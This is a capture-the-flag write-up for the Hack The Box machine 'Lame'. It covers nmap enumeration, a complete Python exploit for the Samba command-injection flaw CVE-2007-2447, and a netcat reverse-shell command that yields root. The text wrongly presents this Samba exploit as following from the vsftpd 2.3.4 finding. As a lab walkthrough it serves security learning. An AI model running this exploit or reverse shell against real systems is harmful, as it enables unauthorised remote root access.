Previous Page

nihilist - 08 / 11 / 19

Lame Writeup

Introduction :



Lame is an easy Linux box which was released back in March 2017.
It features a common vulnerability which could be exploited using a metasploit module.


Requirerements :



Part 1 : Initial Enumeration



As always we begin our Enumeration using Nmap to enumerate opened ports.
We will be using the flags -sC for default scripts and -sV to enumerate versions.

λ root [/home/nihilist] → nmap -sC -sV 10.10.10.3
Starting Nmap 7.70 ( https://nmap.org ) at 2019-06-11 10:55 EDT
Nmap scan report for 10.10.10.3
Host is up (0.27s latency).
Not shown: 996 filtered ports
PORT    STATE SERVICE     VERSION
21/tcp  open  ftp         vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to 10.10.14.6
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      vsFTPd 2.3.4 - secure, fast, stable
|_End of status
22/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey:
|   1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_  2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 3h44m23s, deviation: 0s, median: 3h44m23s
| smb-os-discovery:
|   OS: Unix (Samba 3.0.20-Debian)
|   NetBIOS computer name:
|   Workgroup: WORKGROUP\x00
|_  System time: 2019-06-11T10:39:56-04:00
|_smb2-time: Protocol negotiation failed (SMB2)
Service detection performed.

Nmap done: 1 IP address (1 host up) scanned in 98.43 seconds

Here we can see that the ports 21, 22, 139 and 445 are opened
The port 21 is running an outdated version of vsftpd (here: v2.3.4 current:v3.0.3), this is going to be our main focus for the next part.

Part 2 : Getting User Access



We know that port 21 is running vsftpd 2.3.4, let's see if there are exploits we can use using the searchsploit command:

λ nihilist [~] → searchsploit vsftpd 2.3.4
------------------------------------------------------ ------------------------------
 Exploit Title                                        |  Path
                                                      | (/usr/share/exploitdb/)
------------------------------------------------------ ------------------------------
vsftpd 2.3.4 - Backdoor Command Execution (Metasploit)| exploits/unix/remote/17491.rb
------------------------------------------------------ ------------------------------
Shellcodes: No Result

We could use the metasploit module exploiting the present CVE-2007-2447
But we can also use the following python script in order to exploit our target machine.

  # CVE-2007-2447 - RCE in Samba

  import getopt
  import sys
  from smb import SMBConnection


  def usage():
      print('CVE-2007-2447 - RCE In Samba 2.0.20 < 3.0.25rc3')
      print()
      print('Flags:')
      print('{} - Target Host'.format('\t-t --target'.ljust(20,' ')))
      print('{} - Target Port'.format('\t-p --port'.ljust(20,' ')))
      print('{} - Command to execute'.format('\t-c --cmd'.ljust(20,' ')))
      print()


  def main():
      try:
          opts,args = getopt.getopt(sys.argv[1:],'t:p:c:',['target','port','cmd'])
      except getopt.GetoptError as e:
          print(str(e))
          usage()
          sys.exit(1)
      target = None
      port = None
      cmd = None
      for o,a in opts:
          if o in ('-t','--target'):
              target = a
          elif o in ('-p','--port'):
              try:
                  port = int(a)
              except ValueError:
                  print('[!] Invalid port provided, must be an int')
                  usage()
                  sys.exit(1)
          elif o in ('-c','--cmd'):
              cmd = a
          else:
              print('[!] Invalid option {} with value: {}'.format(o,a))
              usage()
              sys.exit(1)

      missing_param = False

      if target is None:
          print('[!] Must provide target')
          missing_param = True

      if port is None:
          print('[!] Must provide port')
          missing_param = True

      if cmd is None:
          print('[!] Must provide command')
          missing_param = True

      if missing_param:
          usage()
          sys.exit(1)

      print('[+] Generating exploit')
      exploit = '/=`nohup {}`'.format(cmd)

      c = SMBConnection.SMBConnection(exploit, '', '', '')

      try:
          c.connect(target, port, timeout=1)
      except:
          print('[+] Exploit sent')


  if __name__ == '__main__':
      main()

With which we are now able to run using the following commands within 2 separate terminals :

Terminal n°1 :

  λ nihilist [~] → nc -lvnp 4444

Terminal n°2 :

  λ nihilist [~] → python3 cve-2007-2447.py -t 10.10.10.3 -p 445 -c "nc -e /bin/bash 10.10.14.10 4444"
  [+] Generating exploit
  [+] Exploit sent

Which gives us access to the machine. Through a reverse shell back to our local address 10.10.14.10 at the listening 4444 port. within our first Terminal.

Terminal n°1 :

  λ nihilist [~] → nc -lvnp 4444
  connect to [10.10.14.10] from (UNKNOWN) [10.10.10.3] 43358
  # id
  uid=0(root) gid=0(root)

We now have not only user access, but also an Elevated-privilege Reverse Shell which is going to allow us to read both the user and root flags.

Part 3 : The Root Access



All we need to do is print out both the user flag and root flag since we are now logged on as root.

  # id
  uid=0(root) gid=0(root)

  #cat /home/makis/user.txt
  [REDACTED]

  #cat /root/root.txt
  [REDACTED]

Conclusion



Here we can see the progress graph :